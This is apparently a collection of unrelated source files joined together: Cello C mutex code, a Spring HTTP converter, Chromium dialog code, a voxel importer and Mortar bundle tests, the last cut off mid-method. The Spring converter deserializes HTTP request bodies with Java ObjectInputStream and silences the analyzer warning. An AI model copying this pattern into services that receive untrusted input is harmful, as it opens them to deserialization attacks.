  return deref(get(t->tls, key));
}

/* Set trait: store a value (wrapped in a Ref) under a TLS key. */
static void Thread_Set(var self, var key, var val) {
  struct Thread* t = self;
  set(t->tls, key, $R(val));
}

/* Membership test on the TLS table. */
static bool Thread_Mem(var self, var key) {
  struct Thread* t = self;
  return mem(t->tls, key);
}

/* Remove a key from the TLS table. */
static void Thread_Rem(var self, var key) {
  struct Thread* t = self;
  rem(t->tls, key);
}

/* Key/value types of the underlying TLS table (String -> Ref, per Thread_New). */
static var Thread_Key_Type(var self) {
  struct Thread* t = self;
  return key_type(t->tls);
}

static var Thread_Val_Type(var self) {
  struct Thread* t = self;
  return val_type(t->tls);
}

/* Mark trait: let the GC trace objects reachable through the TLS table. */
static void Thread_Mark(var self, var gc, void(*f)(var,void*)) {
  struct Thread* t = self;
  mark(t->tls, gc, f);
}
/* Class object: the traits Thread implements. Note Start bundles
 * start/stop/join/running, and Get doubles as the TLS accessor interface. */
var Thread = Cello(Thread,
  Instance(Doc,
    Thread_Name, Thread_Brief, Thread_Description,
    NULL, Thread_Examples, NULL),
  Instance(New,     Thread_New, Thread_Del),
  Instance(Assign,  Thread_Assign),
  Instance(Cmp,     Thread_Cmp),
  Instance(Hash,    Thread_Hash),
  Instance(Call,    Thread_Call),
  Instance(Current, Thread_Current),
  Instance(Mark,    Thread_Mark),
  Instance(Start,   Thread_Start, Thread_Stop, Thread_Join, Thread_Running),
  Instance(C_Int,   Thread_C_Int),
  Instance(Get,     Thread_Get, Thread_Set, Thread_Mem, Thread_Rem));
/* Doc trait implementations for the Lock class. */

static const char* Lock_Name(void) {
  return "Lock";
}

static const char* Lock_Brief(void) {
  return "Exclusive Resource";
}

static const char* Lock_Description(void) {
  return
    "The `Lock` class can be implemented by types to limit the access to them. "
    "For example this class is implemented by the `Mutex` type to provide "
    "mutual exclusion across Threads.";
}

static const char* Lock_Definition(void) {
  return
    "struct Lock {\n"
    "  void (*lock)(var);\n"
    "  void (*unlock)(var);\n"
    "  bool (*trylock)(var);\n"
    "};\n";
}

/* Method reference table; {name, signature, description} triples. */
static struct Method* Lock_Methods(void) {
  static struct Method methods[] = {
    {
      "lock",
      "void lock(var self);",
      "Wait until a lock can be aquired on object `self`."
    }, {
      "trylock",
      "bool trylock(var self);",
      "Try to acquire a lock on object `self`. Returns `true` on success and "
      "`false` if the resource is busy."
    }, {
      "unlock",
      "void unlock(var self);",
      "Release lock on object `self`."
    }, {NULL, NULL, NULL}
  };
  return methods;
}

static struct Example* Lock_Examples(void) {
  static struct Example examples[] = {
    {
      "Usage",
      "var x = new(Mutex);\n"
      "lock(x); /* Lock Mutex */ \n"
      "print(\"Inside Mutex!\\n\");\n"
      "unlock(x); /* Unlock Mutex */"
    }, {NULL, NULL}
  };
  return examples;
}

/* Class object: Lock is an interface; it only carries documentation. */
var Lock = Cello(Lock,
  Instance(Doc,
    Lock_Name, Lock_Brief, Lock_Description,
    Lock_Definition, Lock_Examples, Lock_Methods));

/* Generic dispatchers onto a type's Lock implementation. */
void lock(var self) {
  method(self, Lock, lock);
}

void unlock(var self) {
  method(self, Lock, unlock);
}

bool trylock(var self) {
  return method(self, Lock, trylock);
}
/* Thin wrapper around the platform mutex primitive. */
struct Mutex {
#if defined(CELLO_UNIX)
  pthread_mutex_t mutex;
#elif defined(CELLO_WINDOWS)
  HANDLE mutex;
#endif
};

/* Doc trait implementations for Mutex. */

static const char* Mutex_Name(void) {
  return "Mutex";
}

static const char* Mutex_Brief(void) {
  return "Mutual Exclusion Lock";
}

static const char* Mutex_Description(void) {
  return
    "The `Mutex` type can be used to gain mutual exclusion across Threads for "
    "access to some resource.";
}

static struct Example* Mutex_Examples(void) {
  static struct Example examples[] = {
    {
      "Usage",
      "var x = new(Mutex);\n"
      "with (mut in x) { /* Lock Mutex */ \n"
      "  print(\"Inside Mutex!\\n\");\n"
      "} /* Unlock Mutex */"
    }, {NULL, NULL}
  };
  return examples;
}
/* Constructor: initialize the platform mutex (unowned, non-recursive
 * defaults). Constructor arguments are unused. */
static void Mutex_New(var self, var args) {
  struct Mutex* m = self;
#if defined(CELLO_UNIX)
  pthread_mutex_init(&m->mutex, NULL);
#elif defined(CELLO_WINDOWS)
  m->mutex = CreateMutex(NULL, false, NULL);
#endif
}

/* Destructor: release the platform mutex. Behavior is undefined by the OS
 * if the mutex is destroyed while locked. */
static void Mutex_Del(var self) {
  struct Mutex* m = self;
#if defined(CELLO_UNIX)
  pthread_mutex_destroy(&m->mutex);
#elif defined(CELLO_WINDOWS)
  CloseHandle(m->mutex);
#endif
}
/* Lock trait: block until the mutex is acquired.
 * pthread error codes are translated into Cello exceptions; EDEADLK is
 * only reported for error-checking mutexes, but is mapped defensively. */
static void Mutex_Lock(var self) {
  struct Mutex* m = self;

#if defined(CELLO_UNIX)
  int err = pthread_mutex_lock(&m->mutex);

  if (err is EINVAL) {
    throw(ValueError, "Invalid Argument to Mutex Lock");
  }

  if (err is EDEADLK) {
    throw(ResourceError, "Attempt to relock already held mutex");
  }
#elif defined(CELLO_WINDOWS)
  WaitForSingleObject(m->mutex, INFINITE);
#endif

}
/* Lock trait: attempt to acquire the mutex without blocking.
 *
 * Returns true if the lock was taken (or if no threading backend is
 * compiled in), false if the mutex is currently held elsewhere.
 *
 * Cleanup: the EBUSY check previously used a bare `==` while every other
 * comparison in this file uses Cello's `is` operator macro -- made
 * consistent; behavior is identical. */
static bool Mutex_Trylock(var self) {
  struct Mutex* m = self;

#if defined(CELLO_UNIX)
  int err = pthread_mutex_trylock(&m->mutex);
  if (err is EBUSY) { return false; }
  if (err is EINVAL) {
    throw(ValueError, "Invalid Argument to Mutex Lock Try");
  }
  return true;
#elif defined(CELLO_WINDOWS)
  return not (WaitForSingleObject(m->mutex, 0) is WAIT_TIMEOUT);
#else
  return true;
#endif

}
/* Lock trait: release the mutex. EPERM means the calling thread does not
 * hold the lock (error-checking mutexes only). */
static void Mutex_Unlock(var self) {
  struct Mutex* m = cast(self, Mutex);
#if defined(CELLO_UNIX)
  int err = pthread_mutex_unlock(&m->mutex);
  if (err is EINVAL) { throw(ValueError, "Invalid Argument to Mutex Unlock"); }
  if (err is EPERM)  { throw(ResourceError, "Mutex cannot be held by caller"); }
#elif defined(CELLO_WINDOWS)
  ReleaseMutex(m->mutex);
#endif
}

/* Class object: implementing Start as lock/unlock is what makes the
 * `with (mut in x) { ... }` idiom from the examples work. */
var Mutex = Cello(Mutex,
  Instance(Doc,
    Mutex_Name, Mutex_Brief, Mutex_Description, NULL, Mutex_Examples, NULL),
  Instance(New,   Mutex_New, Mutex_Del),
  Instance(Lock,  Mutex_Lock, Mutex_Unlock, Mutex_Trylock),
  Instance(Start, Mutex_Lock, Mutex_Unlock, NULL));
| 6,152 |
1,093 | /*
* Copyright 2002-2019 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.integration.http.converter;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import org.springframework.http.HttpInputMessage;
import org.springframework.http.HttpOutputMessage;
import org.springframework.http.MediaType;
import org.springframework.http.converter.AbstractHttpMessageConverter;
import org.springframework.util.FileCopyUtils;
/**
* An {@link org.springframework.http.converter.HttpMessageConverter} implementation for
* {@link Serializable} instances.
*
* @author <NAME>
* @author <NAME>
* @author <NAME>
*
* @since 2.0
*/
public class SerializingHttpMessageConverter extends AbstractHttpMessageConverter<Serializable> {

	private static final MediaType APPLICATION_JAVA_SERIALIZED_OBJECT =
			new MediaType("application", "x-java-serialized-object");

	/** Creates a new instance of the {@code SerializingHttpMessageConverter}. */
	public SerializingHttpMessageConverter() {
		super(APPLICATION_JAVA_SERIALIZED_OBJECT);
	}

	@Override
	public boolean supports(Class<?> clazz) {
		return Serializable.class.isAssignableFrom(clazz);
	}

	@Override
	public boolean canWrite(Class<?> clazz, MediaType mediaType) {
		// Require both a serializable target type and a writable media type.
		return Serializable.class.isAssignableFrom(clazz) && canWrite(mediaType);
	}

	/**
	 * Deserializes the request body using native Java serialization.
	 * <p>NOTE: only safe for trusted peers; kept as-is (see NOSONAR).
	 * @throws IllegalArgumentException if the serialized class is not on the classpath
	 */
	@Override
	@SuppressWarnings("rawtypes")
	public Serializable readInternal(Class clazz, HttpInputMessage inputMessage) throws IOException {
		try {
			return (Serializable) new ObjectInputStream(inputMessage.getBody()).readObject(); //NOSONAR
		}
		catch (ClassNotFoundException e) {
			throw new IllegalArgumentException(e);
		}
	}

	/**
	 * Serializes the payload to an in-memory buffer, then copies it to the
	 * response body in one shot.
	 */
	@Override
	protected void writeInternal(Serializable object, HttpOutputMessage outputMessage) throws IOException {
		ByteArrayOutputStream byteStream = new ByteArrayOutputStream();
		// try-with-resources guarantees the stream is flushed and closed even
		// if serialization fails part-way through (previously it leaked on the
		// exception path).
		try (ObjectOutputStream objectStream = new ObjectOutputStream(byteStream)) {
			objectStream.writeObject(object);
		}
		FileCopyUtils.copy(byteStream.toByteArray(), outputMessage.getBody());
	}

}
| 817 |
336 | <gh_stars>100-1000
/*
* Copyright 2019 Apple Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
*
* You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
*/
package com.shazam.chimprunner;
/** Default configuration values for the chimp runner. */
public class Defaults {
  /** Default output directory name for run artifacts. */
  public static final String CHIMP_OUTPUT = "chimp-output";
  /** DDMS timeout -- presumably milliseconds (TODO confirm against usage). */
  static final int DDMS_TIMEOUT = 30000;
  /** Max time adb may go without producing output before timing out (same unit as above). */
  static final int ADB_MAX_TIME_TO_OUTPUT_RESPONSE = 30000;
  /** Number of iterations to run -- assumed to be measurement repeats; confirm. */
  static final int ITERATIONS = 7;
  /** Leading iterations excluded from results -- assumed warm-up; confirm. */
  static final int ITERATIONS_TO_SKIP = 2;
}
| 267 |
9,959 | import lombok.experimental.*;
// Fixture exercising the legacy @Wither annotation via the star import above.
class WitherLegacyStar {
  @Wither int i;
  WitherLegacyStar(int i) {
    this.i = i;
  }
}
| 54 |
777 | <gh_stars>100-1000
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/ui/views/extensions/bookmark_app_confirmation_view.h"
#include "base/callback_helpers.h"
#include "base/strings/string16.h"
#include "base/strings/string_util.h"
#include "build/build_config.h"
#include "chrome/grit/generated_resources.h"
#include "components/constrained_window/constrained_window_views.h"
#include "components/strings/grit/components_strings.h"
#include "content/public/browser/web_contents.h"
#include "extensions/common/constants.h"
#include "ui/accessibility/ax_node_data.h"
#include "ui/base/l10n/l10n_util.h"
#include "ui/base/resource/resource_bundle.h"
#include "ui/gfx/image/image_skia.h"
#include "ui/gfx/image/image_skia_source.h"
#include "ui/views/controls/button/checkbox.h"
#include "ui/views/controls/image_view.h"
#include "ui/views/controls/textfield/textfield.h"
#include "ui/views/layout/box_layout.h"
#include "ui/views/layout/layout_constants.h"
#include "ui/views/widget/widget.h"
#include "ui/views/window/dialog_client_view.h"
namespace {

// Minimum width of the bubble.
const int kMinBubbleWidth = 300;
// Size of the icon.
const int kIconSize = extension_misc::EXTENSION_ICON_MEDIUM;

// Adapts the icon bitmaps bundled in a WebApplicationInfo into an
// ImageSkia source. Only an icon whose stored width exactly matches the
// requested pixel size is served; any other scale yields a null rep.
class WebAppInfoImageSource : public gfx::ImageSkiaSource {
 public:
  WebAppInfoImageSource(int dip_size, const WebApplicationInfo& info)
      : dip_size_(dip_size), info_(info) {}
  ~WebAppInfoImageSource() override {}

 private:
  // gfx::ImageSkiaSource:
  gfx::ImageSkiaRep GetImageForScale(float scale) override {
    // Convert the DIP size to pixels for this scale factor.
    int size = base::saturated_cast<int>(dip_size_ * scale);
    for (const auto& icon_info : info_.icons) {
      if (icon_info.width == size)
        return gfx::ImageSkiaRep(icon_info.data, scale);
    }
    // No exact-size icon available.
    return gfx::ImageSkiaRep();
  }

  int dip_size_;            // requested icon size, in DIPs
  WebApplicationInfo info_; // copied at construction
};

}  // namespace
BookmarkAppConfirmationView::~BookmarkAppConfirmationView() {}

// static
void BookmarkAppConfirmationView::CreateAndShow(
    gfx::NativeWindow parent,
    const WebApplicationInfo& web_app_info,
    const BrowserWindow::ShowBookmarkAppBubbleCallback& callback) {
  // Wrap the view in a browser-modal dialog and show it. The dialog takes
  // ownership of the view (presumably deleted by the widget on close --
  // standard views ownership; confirm).
  constrained_window::CreateBrowserModalDialogViews(
      new BookmarkAppConfirmationView(web_app_info, callback), parent)
      ->Show();
}
// Builds the dialog contents: [app icon] [editable title field], laid out
// horizontally. |callback| is invoked exactly once when the dialog is
// accepted or dismissed (see Accept() / WindowClosing()).
BookmarkAppConfirmationView::BookmarkAppConfirmationView(
    const WebApplicationInfo& web_app_info,
    const BrowserWindow::ShowBookmarkAppBubbleCallback& callback)
    : web_app_info_(web_app_info),
      callback_(callback),
      open_as_window_checkbox_(nullptr),
      title_tf_(nullptr) {
  views::BoxLayout* layout = new views::BoxLayout(
      views::BoxLayout::kHorizontal, views::kButtonHEdgeMarginNew,
      views::kButtonHEdgeMarginNew, views::kButtonHEdgeMarginNew);
  layout->set_cross_axis_alignment(
      views::BoxLayout::CROSS_AXIS_ALIGNMENT_CENTER);
  SetLayoutManager(layout);

  // App icon, rendered from the bitmaps carried in |web_app_info_|.
  views::ImageView* icon_image_view = new views::ImageView();
  gfx::Size image_size(kIconSize, kIconSize);
  gfx::ImageSkia image(new WebAppInfoImageSource(kIconSize, web_app_info_),
                       image_size);
  icon_image_view->SetImageSize(image_size);
  icon_image_view->SetImage(image);
  AddChildView(icon_image_view);

  // Editable app title, prefilled and fully selected for quick replacement.
  title_tf_ = new views::Textfield();
  title_tf_->SetText(web_app_info_.title);
  title_tf_->SetAccessibleName(
      l10n_util::GetStringUTF16(IDS_BOOKMARK_APP_AX_BUBBLE_NAME_LABEL));
  title_tf_->set_controller(this);
  AddChildView(title_tf_);
  // The text field absorbs all remaining horizontal space.
  layout->SetFlexForView(title_tf_, 1);
  title_tf_->SelectAll(true);
}
views::View* BookmarkAppConfirmationView::GetInitiallyFocusedView() {
  // Focus the title field so the user can edit the app name immediately.
  return title_tf_;
}

ui::ModalType BookmarkAppConfirmationView::GetModalType() const {
  return ui::MODAL_TYPE_WINDOW;
}

base::string16 BookmarkAppConfirmationView::GetWindowTitle() const {
  // Ash pins to the shelf; other desktops add to the desktop.
#if defined(USE_ASH)
  int ids = IDS_ADD_TO_SHELF_BUBBLE_TITLE;
#else
  int ids = IDS_ADD_TO_DESKTOP_BUBBLE_TITLE;
#endif
  return l10n_util::GetStringUTF16(ids);
}

bool BookmarkAppConfirmationView::ShouldShowCloseButton() const {
  return false;
}

void BookmarkAppConfirmationView::WindowClosing() {
  // Runs on every close path. Accept() resets |callback_| via
  // ResetAndReturn, so this null check guarantees the callback fires
  // exactly once -- with false when the user cancels or dismisses.
  if (!callback_.is_null())
    callback_.Run(false, web_app_info_);
}
views::View* BookmarkAppConfirmationView::CreateExtraView() {
  // Extra control placed in the dialog's button row: lets the user choose
  // to open the app as a standalone window rather than a tab.
  open_as_window_checkbox_ = new views::Checkbox(
      l10n_util::GetStringUTF16(IDS_BOOKMARK_APP_BUBBLE_OPEN_AS_WINDOW));
  open_as_window_checkbox_->SetChecked(web_app_info_.open_as_window);
  return open_as_window_checkbox_;
}

bool BookmarkAppConfirmationView::Accept() {
  // NOTE(review): assumes CreateExtraView() has already run (it initializes
  // |open_as_window_checkbox_|); otherwise this dereferences null.
  web_app_info_.title = GetTrimmedTitle();
  web_app_info_.open_as_window = open_as_window_checkbox_->checked();
  // ResetAndReturn clears |callback_| so WindowClosing() won't run it again.
  base::ResetAndReturn(&callback_).Run(true, web_app_info_);
  return true;
}
base::string16 BookmarkAppConfirmationView::GetDialogButtonLabel(
    ui::DialogButton button) const {
  // OK reads "Add"; the cancel button keeps the standard label.
  return l10n_util::GetStringUTF16(button == ui::DIALOG_BUTTON_OK ? IDS_ADD
                                                                  : IDS_CANCEL);
}

bool BookmarkAppConfirmationView::IsDialogButtonEnabled(
    ui::DialogButton button) const {
  // The Add button is disabled while the (trimmed) title is empty.
  return button == ui::DIALOG_BUTTON_OK ? !GetTrimmedTitle().empty() : true;
}

gfx::Size BookmarkAppConfirmationView::GetMinimumSize() const {
  // Enforce a minimum bubble width; height follows the preferred size.
  gfx::Size size(views::DialogDelegateView::GetPreferredSize());
  size.SetToMax(gfx::Size(kMinBubbleWidth, 0));
  return size;
}

void BookmarkAppConfirmationView::ContentsChanged(
    views::Textfield* sender,
    const base::string16& new_contents) {
  DCHECK_EQ(title_tf_, sender);
  // Re-evaluate IsDialogButtonEnabled() as the user types.
  GetDialogClientView()->UpdateDialogButtons();
}
// Returns the contents of the title field with leading and trailing
// whitespace removed.
base::string16 BookmarkAppConfirmationView::GetTrimmedTitle() const {
  base::string16 trimmed;
  base::TrimWhitespace(title_tf_->text(), base::TRIM_ALL, &trimmed);
  return trimmed;
}
| 2,162 |
370 | <reponame>gerritg/voxelshop
package com.vitco.app.importer;
import com.vitco.app.util.file.FileIn;
import com.vitco.app.util.file.RandomAccessFileIn;
import java.awt.*;
import java.io.File;
import java.io.IOException;
/**
* RawVox importer
*/
/**
 * RawVox importer.
 *
 * Reads a "XOVR"-tagged raw voxel volume: a 4-byte magic, three
 * byte-reversed (presumably little-endian) 32-bit dimensions, a
 * bits-per-voxel field, then sx*sy*sz voxel values in x-fastest order.
 * Any non-zero voxel is imported with a fixed color.
 */
public class RawVoxImporter extends AbstractImporter {

  // the voxel color is not defined in the format, so
  // we need to define it here
  private static final int voxelRGB = new Color(158, 194, 88).getRGB();

  // the size of the block that contains the voxel as written in file
  private int sx = 0, sy = 0, sz = 0;

  /** Returns the volume dimensions {sx, sy, sz} read from the header. */
  public final double[] getSize() {
    return new double[] {sx, sy, sz};
  }

  // constructor
  public RawVoxImporter(File file, String layerName) throws IOException {
    super(file, layerName);
  }

  // read file - returns true if file has loaded correctly
  @Override
  protected boolean read(FileIn fileIn, RandomAccessFileIn raf) throws IOException {
    // header
    String header = fileIn.readASCIIString(4);
    if (!header.startsWith("XOVR")) { // check format identifier
      return false;
    }

    // read size of the voxel area
    sx = fileIn.readIntRev();
    sy = fileIn.readIntRev();
    sz = fileIn.readIntRev();
    // sanity check
    // NOTE(review): only zero is rejected; a negative dimension would skip
    // the loops below and "succeed" with no voxels -- confirm acceptable.
    if (sx == 0 || sy == 0 || sz == 0) {
      // required parameter missing/wrong
      return false;
    }

    // read bits per voxel
    int bitsPerVoxel = fileIn.readIntRev();
    // sanity check
    if (bitsPerVoxel != 8 && bitsPerVoxel != 16 && bitsPerVoxel != 32) {
      return false;
    }

    // tmp value
    int bVal = 0;
    // read raw voxel data
    for (int z = 0; z < sz; z++) {
      for (int y = 0; y < sy; y++) {
        for (int x = 0; x < sx; x++) {
          // NOTE(review): for 16/32 bpp this SUMS the bytes rather than
          // composing a multi-byte integer. That suffices for the
          // "is this voxel set" test below (sum > 0 iff any byte != 0),
          // but bVal is not the stored value -- confirm intended.
          if (bitsPerVoxel == 8) {
            bVal = fileIn.readByteUnsigned();
          } else if (bitsPerVoxel == 16) {
            bVal = fileIn.readByteUnsigned() + fileIn.readByteUnsigned();
          } else if (bitsPerVoxel == 32) {
            bVal = fileIn.readByteUnsigned() + fileIn.readByteUnsigned() + fileIn.readByteUnsigned() + fileIn.readByteUnsigned();
          }
          if (bVal > 0) {
            // note the axis remap/negation into the importer's coordinates
            addVoxel(-z,-y,x,voxelRGB);
          }
        }
      }
    }
    return true;
  }
}
| 1,200 |
1,819 | package mortar.bundler;
import android.content.Context;
import android.os.Bundle;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicInteger;
import junit.framework.TestCase;
import mortar.MortarScope;
import mortar.Scoped;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.mockito.Mock;
import org.mockito.invocation.InvocationOnMock;
import org.mockito.stubbing.Answer;
import org.robolectric.RobolectricTestRunner;
import org.robolectric.annotation.Config;
import static mortar.bundler.BundleService.getBundleService;
import static mortar.bundler.BundleServiceRunner.getBundleServiceRunner;
import static org.fest.assertions.api.Assertions.assertThat;
import static org.mockito.Matchers.anyString;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.verifyNoMoreInteractions;
import static org.mockito.Mockito.when;
import static org.mockito.MockitoAnnotations.initMocks;
// Robolectric allows us to use Bundles.
@RunWith(RobolectricTestRunner.class) @Config(manifest = Config.NONE) public class BundleServiceTest
extends TestCase {
  @Mock Scoped scoped;

  private MortarScope activityScope;

  @Before public void setUp() {
    initMocks(this);
    // newProcess() (defined elsewhere in this class) rebuilds the activity
    // scope, simulating a fresh process launch before every test.
    newProcess();
  }

  // register() must reject bundlers whose key is null...
  @Test(expected = IllegalArgumentException.class) public void nonNullKeyRequired() {
    getBundleService(activityScope).register(mock(Bundler.class));
  }

  // ...or empty.
  @Test(expected = IllegalArgumentException.class) public void nonEmptyKeyRequired() {
    Bundler mock = mock(Bundler.class);
    when(mock.getMortarBundleKey()).thenReturn("");
    getBundleService(activityScope).register(mock);
  }

  @Test public void lifeCycle() {
    doLifecycleTest(activityScope);
  }

  @Test public void childLifeCycle() {
    // The same lifecycle contract must hold when registering on a child scope.
    doLifecycleTest(activityScope.buildChild().build("child"));
  }
  // Exercises the full register -> load -> save -> reload -> destroy cycle
  // for bundlers registered on |registerScope| (the activity scope itself or
  // one of its children). Saves/creates are always driven through the
  // activity scope's BundleServiceRunner.
  private void doLifecycleTest(MortarScope registerScope) {
    MyBundler able = new MyBundler("able");
    MyBundler baker = new MyBundler("baker");

    registerScope.register(scoped);
    getBundleService(registerScope).register(able);
    getBundleService(registerScope).register(baker);

    // onEnterScope is called immediately.
    verify(scoped).onEnterScope(registerScope);
    assertThat(able.registered).isSameAs(registerScope);
    assertThat(baker.registered).isSameAs(registerScope);

    // Load is called immediately.
    assertThat(able.loaded).isTrue();
    assertThat(able.lastLoaded).isNull();
    able.reset();
    assertThat(baker.loaded).isTrue();
    assertThat(baker.lastLoaded).isNull();
    baker.reset();

    getBundleServiceRunner(activityScope).onCreate(null);
    // Create loads all registrants.
    assertThat(able.loaded).isTrue();
    assertThat(able.lastLoaded).isNull();
    able.reset();
    assertThat(baker.loaded).isTrue();
    assertThat(baker.lastLoaded).isNull();
    baker.reset();

    // When we save, the bundler gets its own bundle to write to.
    Bundle saved = new Bundle();
    getBundleServiceRunner(activityScope).onSaveInstanceState(saved);
    assertThat(able.lastSaved).isNotNull();
    assertThat(baker.lastSaved).isNotNull();
    assertThat(able.lastSaved).isNotSameAs(baker.lastSaved);

    // If the bundler is re-registered, it loads again.
    able.lastLoaded = null;
    getBundleService(registerScope).register(able);
    assertThat(able.lastLoaded).isSameAs(able.lastSaved);

    // A new activity instance appears
    able.reset();
    baker.reset();
    getBundleServiceRunner(activityScope).onSaveInstanceState(saved);
    Bundle fromNewActivity = new Bundle(saved);
    getBundleServiceRunner(activityScope).onCreate(fromNewActivity);
    assertThat(able.lastLoaded).isNotNull();

    verifyNoMoreInteractions(scoped);

    // Destroying the scope tears down bundlers and scoped registrants alike.
    activityScope.destroy();
    assertThat(able.destroyed).isTrue();
    verify(scoped).onExitScope();
  }
  // The four tests below pin the same contract from four entry points:
  // once a scope is destroyed, neither the runner nor the service can be
  // obtained -- whether looked up via the scope or via a Context bound to it.

  @Test public void cannotGetBundleServiceRunnerFromDestroyed() {
    activityScope.destroy();

    IllegalStateException caught = null;
    try {
      getBundleServiceRunner(activityScope);
    } catch (IllegalStateException e) {
      caught = e;
    }
    assertThat(caught).isNotNull();
  }

  @Test public void cannotGetBundleServiceRunnerFromContextOfDestroyed() {
    // mockContext() (defined elsewhere in this class) binds a Context to the scope.
    Context activity = mockContext(activityScope);
    activityScope.destroy();

    IllegalStateException caught = null;
    try {
      getBundleServiceRunner(activity);
    } catch (IllegalStateException e) {
      caught = e;
    }
    assertThat(caught).isNotNull();
  }

  @Test public void cannotGetBundleServiceForDestroyed() {
    MortarScope child = activityScope.buildChild().build("child");
    child.destroy();

    IllegalStateException caught = null;
    try {
      getBundleService(child);
    } catch (IllegalStateException e) {
      caught = e;
    }
    assertThat(caught).isNotNull();
  }

  @Test public void cannotGetBundleServiceFromContextOfDestroyed() {
    MortarScope child = activityScope.buildChild().build("child");
    Context context = mockContext(child);
    child.destroy();

    IllegalStateException caught = null;
    try {
      getBundleService(context);
    } catch (IllegalStateException e) {
      caught = e;
    }
    assertThat(caught).isNotNull();
  }

  // Double registration of the same Scoped must notify it only once.
  @Test public void onRegisteredIsDebounced() {
    activityScope.register(scoped);
    activityScope.register(scoped);
    verify(scoped, times(1)).onEnterScope(activityScope);
  }
  // Saved state written by bundlers on both the root and a child scope must
  // be restored after a simulated process death (bundle copied, scopes and
  // activity rebuilt). FauxActivity/newProcess are defined elsewhere in
  // this class.
  @Test public void childInfoSurvivesProcessDeath() {
    FauxActivity activity = new FauxActivity();
    activity.create(null);
    Bundle bundle = new Bundle();
    getBundleServiceRunner(activityScope).onSaveInstanceState(bundle);

    // Process death: new copy of the bundle, new scope and activity instances
    bundle = new Bundle(bundle);

    // Activity scopes often include transient values like task id. Make sure
    // BundlerServiceRunner isn't stymied by that.
    newProcess("anotherActivity");
    activity = new FauxActivity();
    activity.create(bundle);
    assertThat(activity.rootBundler.lastLoaded).isNotNull();
    assertThat(activity.childBundler.lastLoaded).isNotNull();
  }

  // A bundler registered from within another bundler's onLoad, before the
  // runner's onCreate, must load immediately and stay registered.
  @Test public void handlesRegisterFromOnLoadBeforeCreate() {
    final MyBundler bundler = new MyBundler("inner");

    getBundleService(activityScope).register(new MyBundler("outer") {
      @Override public void onLoad(Bundle savedInstanceState) {
        super.onLoad(savedInstanceState);
        getBundleService(activityScope).register(bundler);
      }
    });

    // The recursive register call loaded immediately.
    assertThat(bundler.loaded).isTrue();

    // And it was registered: a create call reloads it.
    bundler.reset();
    getBundleServiceRunner(activityScope).onCreate(null);

    assertThat(bundler.loaded).isTrue();
  }
  // Same as above, but the nested registration happens after onCreate has
  // already run; the new bundler must still participate in later creates.
  @Test public void handlesRegisterFromOnLoadAfterCreate() {
    final MyBundler bundler = new MyBundler("inner");

    BundleServiceRunner bundleServiceRunner = getBundleServiceRunner(activityScope);
    bundleServiceRunner.onCreate(null);

    final BundleService bundleService = getBundleService(activityScope);
    bundleService.register(new MyBundler("outer") {
      @Override public void onLoad(Bundle savedInstanceState) {
        bundleService.register(bundler);
      }
    });

    // The recursive register call loaded immediately.
    assertThat(bundler.loaded).isTrue();

    // And it was registered: the next create call reloads it.
    bundler.reset();
    Bundle b = new Bundle();
    bundleServiceRunner.onSaveInstanceState(b);
    bundleServiceRunner.onCreate(b);

    assertThat(bundler.loaded).isNotNull();
  }

  // Registering while a save is in flight is forbidden: onSave must throw
  // IllegalStateException, and the would-be registrant must never load.
  @Test public void cannotRegisterDuringOnSave() {
    final MyBundler bundler = new MyBundler("inner");
    final AtomicBoolean caught = new AtomicBoolean(false);

    BundleServiceRunner bundleServiceRunner = getBundleServiceRunner(activityScope);
    bundleServiceRunner.onCreate(null);

    final BundleService bundleService = getBundleService(activityScope);
    bundleService.register(new MyBundler("outer") {
      @Override public void onSave(Bundle outState) {
        super.onSave(outState);
        try {
          bundleService.register(bundler);
        } catch (IllegalStateException e) {
          caught.set(true);
        }
      }
    });
    assertThat(bundler.loaded).isFalse();

    Bundle bundle = new Bundle();
    bundleServiceRunner.onSaveInstanceState(bundle);
    assertThat(caught.get()).isTrue();
  }
/**
 * Registering before onCreate gives one immediate load at registration time
 * and a second load when onCreate replays registrants (total of 2).
 */
@Test public void handlesReregistrationBeforeCreate() {
  final AtomicInteger i = new AtomicInteger(0);

  final BundleService bundleService = getBundleService(activityScope);
  bundleService.register(new Bundler() {
    @Override public String getMortarBundleKey() {
      return "key";
    }

    @Override public void onEnterScope(MortarScope scope) {
    }

    @Override public void onLoad(Bundle savedInstanceState) {
      // NOTE(review): incrementAndGet() starting from 0 returns >= 1, so this
      // guard can never fire and register(this) is never re-invoked -- confirm
      // whether the condition was meant to be something like < 2.
      if (i.incrementAndGet() < 1) bundleService.register(this);
    }

    @Override public void onSave(Bundle outState) {
      throw new UnsupportedOperationException();
    }

    @Override public void onExitScope() {
      throw new UnsupportedOperationException();
    }
  });

  Bundle b = new Bundle();
  getBundleServiceRunner(activityScope).onCreate(b);

  assertThat(i.get()).isEqualTo(2);
}
/**
 * Registering after onCreate triggers exactly one immediate load; the guarded
 * re-registration inside onLoad does not cause extra loads.
 */
@Test public void handlesReregistrationAfterCreate() {
  Bundle b = new Bundle();
  getBundleServiceRunner(activityScope).onCreate(b);

  final AtomicInteger i = new AtomicInteger(0);

  final BundleService bundleService = getBundleService(activityScope);
  bundleService.register(new Bundler() {
    @Override public String getMortarBundleKey() {
      return "key";
    }

    @Override public void onEnterScope(MortarScope scope) {
    }

    @Override public void onLoad(Bundle savedInstanceState) {
